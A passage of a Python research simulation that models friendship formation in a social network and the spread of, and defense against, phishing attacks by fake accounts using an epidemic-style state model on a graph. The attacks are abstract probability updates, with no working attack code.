                        if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                            G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                        if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                            G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
        pending = friend_pending(G)
        random.shuffle(pending)
    # after 5 rounds: refresh dynamic social capital and trust for every node
    for i in list(G.nodes()):  # update sc and trust values
        social_capital_trust_update(G, i)
    print(G.size())
    return G
'''Update capital data from G and plot probability distribution'''
def post_process(G, capital, i, method, dname, out):
    """Print graph statistics, copy dynamic capital back into *capital*,
    and append per-node SC values to the dataset's result files.

    ``i`` is the run index (only used by the commented-out plotting code);
    returns the updated *capital* frame.
    """
    # print stats
    print(method, 'Edges:', G.size())
    print(method, 'Non-full nodes:',
          len([n for n, v in G.nodes(data=True) if v['full'] == False]))  # nodes still below their friend cap
    print(method, 'Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
    # Add social capital values to capital
    capital_return(capital, G, 'edges')
    capital_return(capital, G, 'STC')
    capital_return(capital, G, 'CC')
    capital_return(capital, G, 'RC')
    capital_return(capital, G, 'SC')
    print('# SC=0: ', sum(capital['SC'] == 0.0))  # how many nodes ended with zero capital
    # # Draw probability distribution
    # if i == 0 and method == 'SC':
    #     fitting_post(capital, dname, 'cognitive', method, 50, out)
    #     fitting_post(capital, dname, 'relational', method, 50, out)
    #     fitting_post(capital, dname, 'human', method, 50, out)
    #     fitting_post(capital, dname, 'RH', method, 50, out)
    #     fitting_post(capital, dname, 'RHC', method, 50, out)
    #     fitting_post(capital, dname, 'edges', method, 50, out)
    #     fitting_post(capital, dname, 'SC', method, 50, out)
    #     fitting_post(capital, dname, 'STC', method, 50, out)
    #     fitting_post(capital, dname, 'CC', method, 50, out)
    #     fitting_post(capital, dname, 'RC', method, 50, out)
    # elif i == 0:
    #     fitting_post(capital, dname, 'edges', method, 50, out)
    #     fitting_post(capital, dname, 'SC', method, 50, out)
    #     fitting_post(capital, dname, 'STC', method, 50, out)
    #     fitting_post(capital, dname, 'CC', method, 50, out)
    #     fitting_post(capital, dname, 'RC', method, 50, out)
    # Append raw SC values per dataset; only these two datasets are persisted
    for feature in ['STC', 'CC', 'RC', 'SC']:
        if dname == 'Cresci15':
            with open('resultcres/' + out + '/' + feature + '_' + method + '.txt', 'a') as f:
                f.write(str(G.nodes(data=feature)) + '\n')
        elif dname == '1ks10kn':
            with open('result1ks/' + out + '/' + feature + '_' + method + '.txt', 'a') as f:
                f.write(str(G.nodes(data=feature)) + '\n')
    return capital
'''Defense for four social deception attacks'''
def defense(G, atta, i, records, j):  # j: attacker, i: target, f: friends
    """Simulate target i's defense against attacker j's attack *atta*.

    i is first marked exposed ('E'); it resists ('R') either by its own
    credibility judgement or via a friend's feedback.  Returns True when
    the attack succeeds (i stays exposed), False when it is resisted.
    ``records`` accumulates per-node resist counts ('sir': self, 'ir': via
    friend).
    """
    start_time = time.time()
    #random.seed(j)
    random.seed(int(start_time))  # reseed from wall clock for each encounter
    G.nodes[i][atta] = 'E'  # mark target as exposed until a defense fires
    flag = True
    # Self defense: perceived credibility falls with the attacker's deception
    # and rises with the target's competence*experience.
    cred = math.exp(-G.nodes[j]['deception']/(G.nodes[i]['competence']*G.nodes[i]['experience']))
    if cred >= random.random():
        # Target detects the attack on its own.
        G.nodes[i][atta] = 'R'
        G.nodes[i]['experience'] = G.nodes[i]['experience'] + 1
        records['sir'][i] = records['sir'][i] + 1
        flag = False
        # Small chance to post about it, educating friends.
        if G.nodes[i]['posting'] >= random.random():
            for f in list(G.neighbors(i)):
                # NOTE(review): `if f` skips node 0, and the isinstance check
                # reads the ATTACKER's state — confirm both are intentional.
                if f and not isinstance(G.nodes[j][atta], int):
                    G.nodes[f]['experience'] = G.nodes[f]['experience'] + 1
    else:  # defense failed: ask friends for help
        if G.nodes[i]['posting'] >= random.random():  # small chance to post
            for f in list(G.neighbors(i)):
                # A susceptible or resistant friend may comment back and help detect.
                if f and (G.nodes[f][atta] == 'S' or G.nodes[f][atta] == 'R') and G.nodes[f]['feedback'] >= random.random():
                    cred_f = math.exp(-G.nodes[j]['deception'] / (G.nodes[f]['competence'] * G.nodes[f]['experience']))
                    if cred_f >= random.random():
                        # Friend spots the attack: both parties gain experience.
                        records['ir'][i] = records['ir'][i] + 1
                        G.nodes[i][atta] = 'R'
                        G.nodes[i]['experience'] = G.nodes[i]['experience'] + 1
                        G.nodes[f]['experience'] = G.nodes[f]['experience'] + 1
                        flag = False
                        break
    return flag
'''Attack find the targets'''
def interaction_ATTACK(G, likers, dname, atta, j, pas, records, i):
    """Run one attack round by attacker node j against a fraction of its
    non-attacker neighbors.

    For `atta == 'phish'`, a random `pas` fraction of eligible neighbors is
    attacked; each target runs `defense`. Infected targets strengthen the
    j-target edge ('f' and 'b' counts); successful defenses report the
    attacker (incrementing its integer `atta` counter) and may cut the edge.
    `likers` and `dname` are unused in this function body.

    Returns the (mutated) graph G.
    """
    start_time = time.time()
    rnd = int(i * 10)
    # NOTE(review): `seed`/`choice` are bare names — presumably numpy.random
    # imports from elsewhere in the file; confirm which RNG they reseed.
    seed(rnd)
    # one-time attack-defense-update
    neighbors = list(G.neighbors(j))
    # eligible victims: neighbors whose attack state is non-int (i.e. not attackers)
    f_list = [x for x, y in G.nodes(data=True) if (not isinstance(G.nodes[x][atta], int) and x in neighbors)]
    random.shuffle(f_list)
    victims = math.ceil(len(f_list) * pas)
    if len(f_list) == 0:
        return G
    elif atta == 'phish': # phishing: select at random
        targets = choice(f_list, victims, replace=False) # attack p_as percent friends
        if type(targets) is list or type(targets) is np.ndarray:
            count_i = 0
            count_a = 0
            for target in targets:
                if G.nodes[target][atta] == 'S' or G.nodes[target][atta] == 'E':
                    count_a = count_a + 1
                    # defense: detect and post to friends/ fail to detect and ask for friend
                    flag = defense(G, atta, target, records, j)
                    records['i'][target] = records['i'][target] + 1
                    if flag == True: # Infected
                        count_i = count_i + 1
                        G.edges[j, target]['f'] = G.edges[j, target]['f'] + 1
                        G.edges[j, target]['b'] = G.edges[j, target]['b'] + 1
                    else: #defense successful
                        G.nodes[j][atta] = G.nodes[j][atta] + 1 #report the attacker
                        if G.nodes[j]['label'] == True:
                            G.remove_edge(j, target) #terminate friendship with compromised account
                        else:
                            G.edges[j, target]['f'] = G.edges[j, target]['f'] + 1
                else: # R user can ignore the attack and report it
                    G.nodes[j][atta] = G.nodes[j][atta] + 1
                    G.nodes[target]['experience'] = G.nodes[target]['experience'] + 1
        else: # scalar
            print("ERROR")
    return G
'''Update SIR for four attacks after one interaction time'''
def sir_process_update(G, attack_sir, run, feat, i):
    """Record normalized S/I/R/E population fractions for the 'phish'
    attack at step `i`.

    Four consecutive slots of `attack_sir`, starting at ``(i - 100) * 4``,
    receive the S, I, R and E fractions in that order. ``run`` and ``feat``
    are accepted for interface compatibility but unused.
    """
    offset = (i - 100) * 4
    phish_states = [y['phish'] for _, y in G.nodes(data=True)]
    s_count = phish_states.count('S')
    e_count = phish_states.count('E')
    r_count = phish_states.count('R')
    # "Infected" = compromised legit users whose phish state was reset to 0
    i_count = len([1 for _, y in G.nodes(data=True)
                   if y['phish'] == 0 and y['label'] == 'Legit'])
    total = s_count + i_count + r_count + e_count
    attack_sir[offset] = s_count / total
    attack_sir[offset + 1] = i_count / total
    attack_sir[offset + 2] = r_count / total
    attack_sir[offset + 3] = e_count / total
'''Update SIR for four attacks after one interaction time'''
def sir_state_change(records, attack_state, i):
    """Record, at step `i`, how many nodes have a nonzero counter in each
    of the four attack-outcome records ('i', 'sr', 'ir', 'sir').

    Writes four consecutive slots of `attack_state` starting at
    ``(i - 100) * 4``, in that key order.
    """
    base = (i - 100) * 4
    for slot, key in enumerate(('i', 'sr', 'ir', 'sir')):
        attack_state[base + slot] = sum(1 for count in records[key].values() if count > 0)
'''Simulate time-series behaviors of users-- Social capital dimensions'''
def interaction_SC(G, dname, likers, feature, p_as, run, attack_sir, attack_state, attack_report, feat):
    """Run the 105-step simulation where users befriend by the social-capital
    node attribute `feature`.

    Steps 0-99 run friend invitations (candidates ranked by `feature`,
    highest first); steps 0-79 additionally run positive feeding/feedback
    interactions and social-capital updates; steps 100-104 run phishing
    attack/defense rounds. `attack_sir`, `attack_state` and `attack_report`
    are filled in place; `likers` is only passed through to
    `interaction_ATTACK`. Returns the mutated graph G.
    """
    start_time = time.time()
    rnd = int(start_time)
    print("run seed:", rnd)
    random.seed(rnd)
    #recording attacks
    records = {}
    records['i'] = {no: 0 for no in G.nodes()}
    records['sr'] = {no: 0 for no in G.nodes()}
    records['ir'] = {no: 0 for no in G.nodes()}
    records['sir'] = {no: 0 for no in G.nodes()}
    invite = {no: 0 for no in G.nodes()}
    # initial SIR state: legit users susceptible, attackers get a report counter
    for _, y in G.nodes(data=True):
        attack = 'phish'
        if y['label'] == 'Legit':
            y[attack] = 'S'
        else:
            y[attack] = 0
    size_prev = G.size()
    for i in range(105):
        size_invite = 0
        if i < 100: # inviting friends only
            pending = friend_pending(G)
            random.shuffle(pending)
            full_nodes = set(G.nodes()) - set(pending)
            ###
            edge_cur = [0 for x in pending] #can change to attribute of G
            for j in pending:
                idx_j = pending.index(j)
                limit_j = G.nodes[j]['edge_interaction']
                if G.nodes[j]['full'] == True:
                    continue
                ###
                a = random.random()
                if G.nodes[j]['inviting'] >= a:
                    size_invite = size_invite + 1
                    invite[j] = invite[j] + 1
                    # find all possible k
                    friend_j = list(G.neighbors(j))
                    list_k = deepcopy(pending)
                    list_k.remove(j)
                    list_k = list(set(list_k) - set(friend_j))
                    if len(list_k) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    # collect all k to node_list
                    node_list0 = {}
                    for k in list_k:
                        if G.nodes[k]['full'] == False:
                            node_list0[k] = G.nodes[k][feature]
                    if len(node_list0) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    node_list = {}
                    for k in node_list0.keys():
                        if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
                            node_list[k] = node_list0[k]
                    if len(node_list) == 0:
                        continue
                    # rank node_list and pick top 1 or 10/20
                    node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
                    flag = 0
                    ranked = list(node_list.keys()) # ascending
                    length = len(ranked)
                    # #select top 1 value
                    while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
                        if len(node_list) == 0 or G.nodes[j]['full'] == True:
                            break
                        ranked = list(node_list.keys()) # ascending
                        f = ranked[-1]
                        # legit candidates reject inviters with lower feature value
                        if G.nodes[f]['label'] == 'Legit' and G.nodes[j][feature] < 1.0 * node_list[f]:
                            del node_list[f]
                            continue
                        if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
                            new_friend(G, j, f)
                            flag = 1
                            edge_cur[idx_j] = edge_cur[idx_j] + 1
                            edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
                        del node_list[f]
            size_prev = G.size()
            full_nodes_new = set(G.nodes()) - set(friend_pending(G))
            full_nodes_iter = full_nodes_new - full_nodes
            # print(G.size())
        if i < 80:
            # simulate positive interaction
            for j in list(G.nodes()):
                if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
                    for fb in list(G.neighbors(j)): # update feeding
                        G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                        if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                            G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                        if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                            G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                        if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
                            G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                            if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                                G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                            if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                                G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
            # update sc values after each run
            for j in list(G.nodes()):
                social_capital_update(G, j)
        else: # attack and defense
            nodes = list(G.nodes())
            random.shuffle(nodes)
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int):
                    G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
            # stats collection
            count = 0 # reported attackers
            for j in nodes:
                if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3:
                    count = count + 1
            attack_report[i-100] = count
            sir_state_change(records, attack_state, i)
            # post-attack updates: attacker report
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int): #attackers
                    # removed the reported attackers from the network/ compromised user back to S
                    if G.nodes[j]['phish'] >= 3:
                        if G.nodes[j]['label'] == True: # compromised account
                            G.nodes[j]['phish'] = 'R' # change password
                            G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
                        else: # remove the attacker
                            nb = list(G.neighbors(j))
                            for k in nb:
                                G.remove_edge(j, k)
                else: #normal users
                    if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #E to attacker I, compromised account
                        G.nodes[j]['phish'] = 0 #20% chance to be compromised accounts
            sir_process_update(G, attack_sir, run, feat, i) #update S E I R
        # printing
        if i == 100:
            invite_times = {}
            invite_friends = {}
            for x in sorted(invite.keys()):
                if invite[x] > 0:
                    invite_times[x] = invite[x]
                    invite_friends[x] = G.nodes[x]['friends']
            print(len(invite_times))
        if (i + 1) % 20 == 0:
            print("%s edges at %d :%d" % (feature, i, G.size()))
            print((time.time() - start_time) / 60)
    # final summary over fake accounts
    sum = 0
    diff = 0
    fake_edges = {}
    fake_friends = {}
    for x in G.nodes():
        if G.nodes[x]['label'] == 'Fake':
            diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
            sum = sum + G.nodes[x]['friends']
            fake_edges[x] = G.nodes[x]['edges']
            fake_friends[x] = G.nodes[x]['friends']
    print("sum of fake friends:", sum)
    print("sumdiff of fake friends:", diff)
    return G
'''Simulate time-series behaviors of users-- Topics similarity'''
def interaction_TP(G, dname, likers, topics, p_as, run, attack_sir, attack_state, attack_report, feat):
    """Run the 105-step simulation where users befriend by topic similarity.

    A symmetric cosine-similarity matrix over `topics` rows (indexed by node
    id) drives candidate ranking. Steps 0-99 run friend invitations; steps
    0-79 additionally run positive feeding/feedback interactions; steps
    100-104 run phishing attack/defense rounds. `attack_sir`,
    `attack_state` and `attack_report` are filled in place. Returns the
    mutated graph G.
    """
    start_time = time.time()
    rnd = int(start_time)
    print("run seed:", rnd)
    random.seed(rnd)
    #recording attacks
    records = {}
    records['i'] = {no: 0 for no in G.nodes()}
    records['sr'] = {no: 0 for no in G.nodes()}
    records['ir'] = {no: 0 for no in G.nodes()}
    records['sir'] = {no: 0 for no in G.nodes()}
    invite = {no: 0 for no in G.nodes()}
    #random.seed(int(start_time))
    for _, y in G.nodes(data=True):
        for attack in ['phish', 'falseinfo', 'profile', 'humanatt']:
            if y['label'] == 'Legit':
                y[attack] = 'S'
            else:
                y[attack] = 0
    # adjacency matrix to save similarity
    # only the upper triangle (y > x) is filled; callers index with min/max
    size = max(G.nodes()) + 1
    product_matrix = np.zeros((size, size))
    for x in G.nodes():
        dot_x = topics.loc[x]
        for y in G.nodes():
            if y > x:
                dot_y = topics.loc[y]
                mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
                product_matrix[x][y] = mut
    size_prev = G.size()
    for i in range(105):
        size_invite = 0
        if i < 100: # inviting friends only
            pending = friend_pending(G)
            random.shuffle(pending)
            full_nodes = set(G.nodes()) - set(pending)
            edge_cur = [0 for x in pending] #can change to attribute of G
            for j in pending:
                idx_j = pending.index(j)
                limit_j = G.nodes[j]['edge_interaction']
                if G.nodes[j]['full'] == True:
                    continue
                ###
                a = random.random()
                if G.nodes[j]['inviting'] >= a:
                    size_invite = size_invite + 1
                    invite[j] = invite[j] + 1
                    # find all possible k
                    friend_j = list(G.neighbors(j))
                    list_k = deepcopy(pending)
                    list_k.remove(j)
                    list_k = list(set(list_k) - set(friend_j))
                    if len(list_k) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    node_list0 = {}
                    for k in list_k:
                        if G.nodes[k]['full'] == False:
                            node_list0[k] = product_matrix[min(j, k)][max(j, k)]
                    if len(node_list0) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    node_list = {}
                    for k in node_list0.keys():
                        if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
                            node_list[k] = node_list0[k]
                    if len(node_list) == 0:
                        continue
                    # rank node_list and pick top 1
                    node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
                    flag = 0
                    while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
                        if len(node_list) == 0 or G.nodes[j]['full'] == True:
                            break
                        ranked = list(node_list.keys()) # ascending
                        f = ranked[-1]
                        # legit candidates reject inviters far below their best
                        # neighbor's similarity (20% threshold)
                        if G.nodes[f]['label'] == 'Legit':
                            tp_max = 0
                            for k in G.neighbors(f):
                                if tp_max < product_matrix[min(f, k)][max(f, k)]:
                                    tp_max = product_matrix[min(f, k)][max(f, k)]
                            if node_list[f] < 0.2 * tp_max:
                                del node_list[f]
                                continue
                        ###
                        if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
                            new_friend(G, j, f)
                            flag = 1
                            edge_cur[idx_j] = edge_cur[idx_j] + 1
                            edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
                        del node_list[f]
            size_prev = G.size()
            full_nodes_new = set(G.nodes()) - set(friend_pending(G))
            full_nodes_iter = full_nodes_new - full_nodes
        if i < 80:
            # simulate positive interaction
            for j in list(G.nodes()):
                if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
                    for fb in list(G.neighbors(j)): # update feeding
                        G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                        if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                            G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                        if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                            G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                        if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
                            G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                            if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                                G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                            if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                                G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
            # update sc values after each run
            for j in list(G.nodes()):
                social_capital_update(G, j)
        else: # attack and defense
            nodes = list(G.nodes())
            random.shuffle(nodes)
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int):
                    G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
            # stats collection
            count = 0 # reported attackers
            for j in nodes:
                if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3: #deception == 2.5
                    count = count + 1
            attack_report[i-100] = count
            sir_state_change(records, attack_state, i)
            # post-attack updates: attacker report and user transformation
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int): #attackers
                    # removed the reported attackers from the network/ compromised user back to S
                    if G.nodes[j]['phish'] >= 3:
                        if G.nodes[j]['label'] == True: # compromised account
                            G.nodes[j]['phish'] = 'R' # change password
                            G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
                        else: # remove the attacker
                            nb = list(G.neighbors(j))
                            for k in nb:
                                G.remove_edge(j, k)
                else: #normal users
                    if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #I to attacker, compromised account
                        G.nodes[j]['phish'] = 0
            sir_process_update(G, attack_sir, run, feat, i)
        # printing
        if i == 100:
            invite_times = {}
            invite_friends = {}
            for x in sorted(invite.keys()):
                if invite[x] > 0:
                    invite_times[x] = invite[x]
                    invite_friends[x] = G.nodes[x]['friends']
            print(len(invite_times))
        if (i + 1) % 20 == 0:
            print("TP edges at %d :%d" % (i, G.size()))
            print((time.time() - start_time) / 60)
    # final summary over fake accounts
    sum = 0
    diff = 0
    fake_edges = {}
    fake_friends = {}
    for x in G.nodes():
        if G.nodes[x]['label'] == 'Fake':
            diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
            sum = sum + G.nodes[x]['friends']
            fake_edges[x] = G.nodes[x]['edges']
            fake_friends[x] = G.nodes[x]['friends']
    print("sum of fake friends:", sum)
    print("sumdiff of fake friends:", diff)
    return G
'''Simulate time-series behaviors of users-- Social attributes'''
def interaction_SA(G, dname, likers, p_as, run, attack_sir, attack_state, attack_report, feat):
    """Run the 105-step simulation where users befriend by social-attribute
    similarity.

    Similarity is the cosine of the (human, cognitive, relational) node
    vectors, precomputed into an upper-triangular matrix. Steps 0-99 run
    friend invitations; steps 0-79 additionally run positive interactions;
    steps 100-104 run phishing attack/defense rounds. `attack_sir`,
    `attack_state` and `attack_report` are filled in place. Returns the
    mutated graph G.
    """
    start_time = time.time()
    rnd = int(start_time)
    print("run seed:", rnd)
    random.seed(rnd)
    #recording attacks
    records = {}
    records['i'] = {no: 0 for no in G.nodes()}
    records['sr'] = {no: 0 for no in G.nodes()}
    records['ir'] = {no: 0 for no in G.nodes()}
    records['sir'] = {no: 0 for no in G.nodes()}
    invite = {no: 0 for no in G.nodes()}
    #random.seed(int(start_time))
    for _, y in G.nodes(data=True):
        for attack in ['phish', 'falseinfo', 'profile', 'humanatt']:
            if y['label'] == 'Legit':
                y[attack] = 'S'
            else:
                y[attack] = 0
    # adjacency matrix to save similarity
    # only the upper triangle (y > x) is filled; callers index with min/max
    size = max(G.nodes()) + 1
    product_matrix = np.zeros((size, size))
    for x in G.nodes():
        dot_x = [G.nodes[x]['human'], G.nodes[x]['cognitive'], G.nodes[x]['relational']]
        for y in G.nodes():
            if y > x:
                dot_y = [G.nodes[y]['human'], G.nodes[y]['cognitive'], G.nodes[y]['relational']]
                mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
                product_matrix[x][y] = mut
    size_prev = G.size()
    for i in range(105):
        size_invite = 0
        if i < 100: # inviting friends only
            pending = friend_pending(G)
            random.shuffle(pending)
            full_nodes = set(G.nodes()) - set(pending)
            edge_cur = [0 for x in pending] #can change to attribute of G
            for j in pending:
                idx_j = pending.index(j)
                limit_j = G.nodes[j]['edge_interaction']
                if G.nodes[j]['full'] == True:
                    continue
                a = random.random()
                if G.nodes[j]['inviting'] >= a:
                    size_invite = size_invite + 1
                    invite[j] = invite[j] + 1
                    # find all possible k
                    friend_j = list(G.neighbors(j))
                    list_k = deepcopy(pending)
                    list_k.remove(j)
                    list_k = list(set(list_k) - set(friend_j))
                    if len(list_k) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    node_list0 = {}
                    for k in list_k:
                        if G.nodes[k]['full'] == False:
                            node_list0[k] = product_matrix[min(j, k)][max(j, k)]
                    if len(node_list0) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    node_list = {}
                    for k in node_list0.keys():
                        if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
                            node_list[k] = node_list0[k]
                    if len(node_list) == 0:
                        continue
                    # rank node_list and pick top 1
                    node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
                    flag = 0
                    while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
                        if len(node_list) == 0 or G.nodes[j]['full'] == True:
                            break
                        ranked = list(node_list.keys()) # ascending
                        f = ranked[-1]
                        # legit candidates reject inviters far below their best
                        # neighbor's similarity (60% threshold)
                        if G.nodes[f]['label'] == 'Legit':
                            as_max = 0
                            for k in G.neighbors(f):
                                if as_max < product_matrix[min(f, k)][max(f, k)]:
                                    as_max = product_matrix[min(f, k)][max(f, k)]
                            if node_list[f] < 0.6 * as_max:
                                del node_list[f]
                                continue
                        if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
                            new_friend(G, j, f)
                            flag = 1
                            edge_cur[idx_j] = edge_cur[idx_j] + 1
                            edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
                        del node_list[f]
            size_prev = G.size()
            full_nodes_new = set(G.nodes()) - set(friend_pending(G))
            full_nodes_iter = full_nodes_new - full_nodes
        if i<80:
            # simulate positive interaction
            for j in list(G.nodes()):
                if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
                    for fb in list(G.neighbors(j)): # update feeding
                        G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                        if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                            G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                        if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                            G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                        if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
                            G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                            if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                                G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                            if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                                G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
            # update sc values after each run
            for j in list(G.nodes()):
                social_capital_update(G, j)
        else: # attack and defense
            nodes = list(G.nodes())
            random.shuffle(nodes)
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int):
                    G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
            # stats collection
            count = 0 # reported attackers
            for j in nodes:
                if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3: #deception == 2.5
                    count = count + 1
            attack_report[i-100] = count
            sir_state_change(records, attack_state, i)
            # post-attack updates: attacker report and user transformation
            for j in nodes:
                if isinstance(G.nodes[j]['phish'], int): #attackers
                    # removed the reported attackers from the network/ compromised user back to S
                    if G.nodes[j]['phish'] >= 3:
                        if G.nodes[j]['label'] == True: # compromised account
                            G.nodes[j]['phish'] = 'R' # change password
                            G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
                        else: # remove the attacker
                            nb = list(G.neighbors(j))
                            for k in nb:
                                G.remove_edge(j, k)
                else: #normal users
                    if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #I to attacker, compromised account
                        G.nodes[j]['phish'] = 0
            sir_process_update(G, attack_sir, run, feat, i)
        # printing
        if i == 100:
            invite_times = {}
            invite_friends = {}
            for x in sorted(invite.keys()):
                if invite[x] > 0:
                    invite_times[x] = invite[x]
                    invite_friends[x] = G.nodes[x]['friends']
            print(len(invite_times))
        if (i + 1) % 20 == 0:
            print("SA edges at %d :%d" % (i, G.size()))
            print((time.time() - start_time) / 60)
    # final summary over fake accounts
    sum = 0
    diff = 0
    fake_edges = {}
    fake_friends = {}
    for x in G.nodes():
        if G.nodes[x]['label'] == 'Fake':
            diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
            sum = sum + G.nodes[x]['friends']
            fake_edges[x] = G.nodes[x]['edges']
            fake_friends[x] = G.nodes[x]['friends']
    print("sum of fake friends:", sum)
    print("sumdiff of fake friends:", diff)
    return G
'''Simulate time-series behaviors of users-- Trust friend'''
def interaction_TR(G, dname, likers, feature, p_as, run, attack_sir, attack_state, attack_report, feat):
    """Run the 105-step simulation where users befriend by the 'trust'
    node attribute.

    Steps 0-99 run friend invitations ranked by trust (highest first);
    steps 0-79 additionally run positive interactions and trust/capital
    updates via `social_capital_trust_update`; steps 100-104 run phishing
    attack/defense rounds. `attack_sir`, `attack_state` and `attack_report`
    are filled in place; `feature` is only used for the progress print.
    Returns the mutated graph G.
    """
    start_time = time.time()
    rnd = int(start_time)
    print("run seed:", rnd)
    random.seed(rnd)
    # recording attacks
    records = {}
    records['i'] = {no: 0 for no in G.nodes()}
    records['sr'] = {no: 0 for no in G.nodes()}
    records['ir'] = {no: 0 for no in G.nodes()}
    records['sir'] = {no: 0 for no in G.nodes()}
    invite = {no: 0 for no in G.nodes()}
    # set SIR(legit) or reported time(attacker)
    for _, y in G.nodes(data=True):
        for attack in ['phish']:
            if y['label'] == 'Legit':
                y[attack] = 'S' #for legit users
            else:
                y[attack] = 0 #for attackers
    # Dynamic interactions
    size_prev = G.size()
    for i in range(105):
        size_invite = 0
        if i < 100: # no attacks
            pending = friend_pending(G)
            random.shuffle(pending)
            full_nodes = set(G.nodes()) - set(pending)
            edge_cur = [0 for x in pending] #can change to attribute of G
            for j in pending:
                idx_j = pending.index(j)
                limit_j = G.nodes[j]['edge_interaction']
                if G.nodes[j]['full'] == True:
                    continue
                a = random.random()
                if G.nodes[j]['inviting'] >= a:
                    size_invite = size_invite + 1
                    invite[j] = invite[j] + 1
                    # find all possible k
                    friend_j = list(G.neighbors(j))
                    list_k = deepcopy(pending)
                    list_k.remove(j)
                    list_k = list(set(list_k) - set(friend_j))
                    if len(list_k) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    # collect all k to node_list
                    node_list0 = {}
                    for k in list_k:
                        if G.nodes[k]['full'] == False:
                            node_list0[k] = G.nodes[k]['trust']
                    if len(node_list0) == 0:
                        G.nodes[j]['full'] = True
                        continue
                    node_list = {}
                    for k in node_list0.keys():
                        if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
                            node_list[k] = node_list0[k]
                    if len(node_list) == 0:
                        continue
                    # rank node_list and pick top 1
                    node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
                    flag = 0
                    ranked = list(node_list.keys()) # ascending
                    length = len(ranked)
                    # select top 1 value
                    while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
